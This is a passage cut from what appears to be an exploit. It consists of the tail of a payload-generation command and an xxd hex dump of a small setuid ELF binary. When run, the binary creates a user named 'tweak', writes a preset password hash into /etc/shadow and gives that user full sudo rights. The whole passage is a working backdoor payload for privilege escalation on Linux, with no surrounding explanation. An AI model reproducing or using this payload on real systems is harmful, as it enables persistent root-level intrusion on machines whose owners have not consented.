echo 0 > /proc/sys/vm/dirty_writeback_centisecs; useradd tweak -m -s /bin/bash; sed 's/tweak.*:/tweak:\$6\$gUGoeBlc\$yU794nb14cZ6ZvcHPwG\/apjC0bpMph1NeLu2Dh6JTEdB82b93aU3zXXTnIb4kUUFfROP6ARbMB4FjgBWR1fhq0:16953:0:99999:7:::/m' -i /etc/shadow; echo \"tweak   ALL=(ALL:ALL) ALL\" >> /etc/sudoers.d/test; chown root.root /etc/sudoers.d/test;" PrependSetuid=True -f elf | xxd -i
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xf3, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6e, 0x03, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  0x4c, 0x01, 0x00, 0x00, 0x65, 0x63, 0x68, 0x6f, 0x20, 0x30, 0x20, 0x3e,
  0x20, 0x2f, 0x70, 0x72, 0x6f, 0x63, 0x2f, 0x73, 0x79, 0x73, 0x2f, 0x76,
  0x6d, 0x2f, 0x64, 0x69, 0x72, 0x74, 0x79, 0x5f, 0x77, 0x72, 0x69, 0x74,
  0x65, 0x62, 0x61, 0x63, 0x6b, 0x5f, 0x63, 0x65, 0x6e, 0x74, 0x69, 0x73,
  0x65, 0x63, 0x73, 0x3b, 0x20, 0x75, 0x73, 0x65, 0x72, 0x61, 0x64, 0x64,
  0x20, 0x74, 0x77, 0x65, 0x61, 0x6b, 0x20, 0x2d, 0x6d, 0x20, 0x2d, 0x73,
  0x20, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x3b, 0x20,
  0x73, 0x65, 0x64, 0x20, 0x27, 0x73, 0x2f, 0x74, 0x77, 0x65, 0x61, 0x6b,
  0x2e, 0x2a, 0x3a, 0x2f, 0x74, 0x77, 0x65, 0x61, 0x6b, 0x3a, 0x24, 0x36,
  0x24, 0x67, 0x55, 0x47, 0x6f, 0x65, 0x42, 0x6c, 0x63, 0x24, 0x79, 0x55,
  0x37, 0x39, 0x34, 0x6e, 0x62, 0x31, 0x34, 0x63, 0x5a, 0x36, 0x5a, 0x76,
  0x63, 0x48, 0x50, 0x77, 0x47, 0x5c, 0x2f, 0x61, 0x70, 0x6a, 0x43, 0x30,
  0x62, 0x70, 0x4d, 0x70, 0x68, 0x31, 0x4e, 0x65, 0x4c, 0x75, 0x32, 0x44,
  0x68, 0x36, 0x4a, 0x54, 0x45, 0x64, 0x42, 0x38, 0x32, 0x62, 0x39, 0x33,
  0x61, 0x55, 0x33, 0x7a, 0x58, 0x58, 0x54, 0x6e, 0x49, 0x62, 0x34, 0x6b,
  0x55, 0x55, 0x46, 0x66, 0x52, 0x4f, 0x50, 0x36, 0x41, 0x52, 0x62, 0x4d,
  0x42, 0x34, 0x46, 0x6a, 0x67, 0x42, 0x57, 0x52, 0x31, 0x66, 0x68, 0x71,
  0x30, 0x3a, 0x31, 0x36, 0x39, 0x35, 0x33, 0x3a, 0x30, 0x3a, 0x39, 0x39,
  0x39, 0x39, 0x39, 0x3a, 0x37, 0x3a, 0x3a, 0x3a, 0x2f, 0x6d, 0x27, 0x20,
  0x2d, 0x69, 0x20, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x73, 0x68, 0x61, 0x64,
  0x6f, 0x77, 0x3b, 0x20, 0x65, 0x63, 0x68, 0x6f, 0x20, 0x22, 0x74, 0x77,
  0x65, 0x61, 0x6b, 0x20, 0x41, 0x4c, 0x4c, 0x3d, 0x28, 0x41, 0x4c, 0x4c,
  0x3a, 0x41, 0x4c, 0x4c, 0x29, 0x20, 0x41, 0x4c, 0x4c, 0x22, 0x20, 0x3e,
  0x3e, 0x20, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x73, 0x75, 0x64, 0x6f, 0x65,
  0x72, 0x73, 0x2e, 0x64, 0x2f, 0x74, 0x65, 0x73, 0x74, 0x3b, 0x20, 0x63,
  0x68, 0x6f, 0x77, 0x6e, 0x20, 0x72, 0x6f, 0x6f, 0x74, 0x2e, 0x72, 0x6f,
  0x6f, 0x74, 0x20, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x73, 0x75, 0x64, 0x6f,
  0x65, 0x72, 0x73, 0x2e, 0x64, 0x2f, 0x74, 0x65, 0x73, 0x74, 0x3b, 0x00,
  0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
